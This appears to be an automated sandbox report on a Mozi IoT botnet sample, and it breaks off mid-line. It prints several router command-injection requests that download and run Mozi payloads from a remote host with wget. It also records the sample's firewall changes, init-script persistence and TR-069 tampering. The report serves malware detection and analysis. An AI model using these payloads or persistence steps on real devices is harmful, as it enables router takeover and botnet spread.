              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
              Source: Initial samplePotential command found: GET /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
              Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
              Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
              Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: Mozi.m, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: classification engineClassification label: mal100.spre.troj.evad.linM@0/230@0/0

              Persistence and Installation Behavior:

              barindex
              Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
              Source: /bin/sh (PID: 3690)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3725)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3739)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3772)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3783)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3808)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3813)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3822)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 4029)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4032)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4036)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4055)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4107)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4137)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4162)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4180)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4199)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 4216)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 4239)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 4251)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 4275)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 4285)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 4314)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 4328)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 4353)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4364)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4390)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4408)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4429)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4440)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4467)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4478)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
              Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
              Source: /tmp/Mozi.m (PID: 3492)File: /proc/3492/mounts
              Sample tries to persist itself using /etc/profileShow sources
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/cedilla-portuguese.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/apps-bin-path.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/Z97-byobu.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/bash_completion.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/vte-2.91.sh
              Sample tries to persist itself using System V runlevelsShow sources
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/rcS.d/S95baby.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/rc.local
              Terminates several processes with shell command 'killall'Show sources
              Source: /bin/sh (PID: 3496)Killall command executed: killall -9 telnetd utelnetd scfgmgr
              Source: /bin/mkdir (PID: 3865)Directory: .cache
              Source: /bin/mkdir (PID: 3874)Directory: .cache
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/230/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/231/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2427/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/232/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/233/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/234/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/235/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/236/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/237/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/238/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/359/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1452/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2420/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/239/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/10/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1339/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/11/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/12/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/13/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/14/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/15/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/16/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/17/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/18/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/19/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1471/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/240/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/120/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/241/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/483/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/242/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/243/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/244/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1468/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2315/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2315/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/3/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/245/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1346/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2314/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2314/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/4/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/246/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/5/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/247/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/6/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/248/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/7/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/249/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/8/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/9/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/20/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/21/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/22/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/23/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/24/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/25/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/26/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/28/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/29/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1363/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1362/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/250/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/251/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/252/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/253/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/254/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/496/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/496/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/255/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2205/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/256/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/257/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/258/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/259/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2201/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/30/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/31/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/31/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2209/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2209/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1119/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2220/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/260/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/261/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/262/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/263/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/264/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/385/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/144/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/386/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2217/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/145/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/266/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/146/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2215/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/147/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/148/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/149/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2211/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/822/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/822/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/47/stat
              Source: /tmp/Mozi.m (PID: 3494)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/Mozi.m (PID: 3688)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3722)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3733)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3770)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3776)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3803)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3811)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3815)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4027)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4030)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4033)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4044)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4076)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/Mozi.m (PID: 4087)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/Mozi.m (PID: 4100)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4127)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4154)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4175)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4192)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4207)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4235)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4241)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4269)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4279)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4303)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4321)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4351)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4357)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4386)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4397)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4426)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4433)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4462)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4471)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT"
              Source: /bin/egrep (PID: 3875)Grep executable: /bin/grep -> grep -E [^[:print:]] /home/user/.cache/logrotate/status
              Source: /bin/sh (PID: 3690)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3725)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3739)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3772)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3783)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3808)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3813)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3822)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 4029)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4032)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4036)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4055)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4107)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4137)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4162)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4180)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4199)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 4216)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 4239)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 4251)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 4275)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 4285)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 4314)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 4328)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 4353)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4364)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4390)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4408)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4429)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4440)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4467)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4478)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
              Source: /sbin/resolvconf (PID: 3646)Mkdir executable: /bin/mkdir -> mkdir -p /run/resolvconf/interface
              Source: /bin/dash (PID: 3865)Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/logrotate
              Source: /bin/dash (PID: 3874)Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/upstart
              Source: /bin/dash (PID: 3928)Mktemp executable: /bin/mktemp -> mktemp
              Source: /bin/dash (PID: 4018)Rm executable: /bin/rm -> rm -f /tmp/tmp.vHWsTctARt
              Source: /tmp/Mozi.m (PID: 3678)Reads from proc file: /proc/stat
              Source: /tmp/Mozi.m (PID: 3492)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/Mozi.m (PID: 3492)File written: /usr/networksJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
              Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 11 (Segmentation fault) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705: exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Drops files in suspicious directoriesShow sources
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/S95baby.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountall.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/checkfs.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/umountnfs.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountkernfs.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/bootmisc.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/checkroot.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/hostname.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountdevsubfs.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountall-bootclean.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountnfs.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /usr/bin/gettext.shJump to dropped file
              Source: /tmp/Mozi.m (PID: 3492)File: /usr/sbin/alsa-info.shJump to dropped file
              Source: /bin/dash (PID: 3193)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3225)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3249)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3280)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3305)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3333)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3369)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3397)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3425)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3453)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3534)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3558)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3586)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3614)Sleep executable: /bin/sleep -> sleep 1
              Source: /tmp/Mozi.m (PID: 3480)Queries kernel information via 'uname':
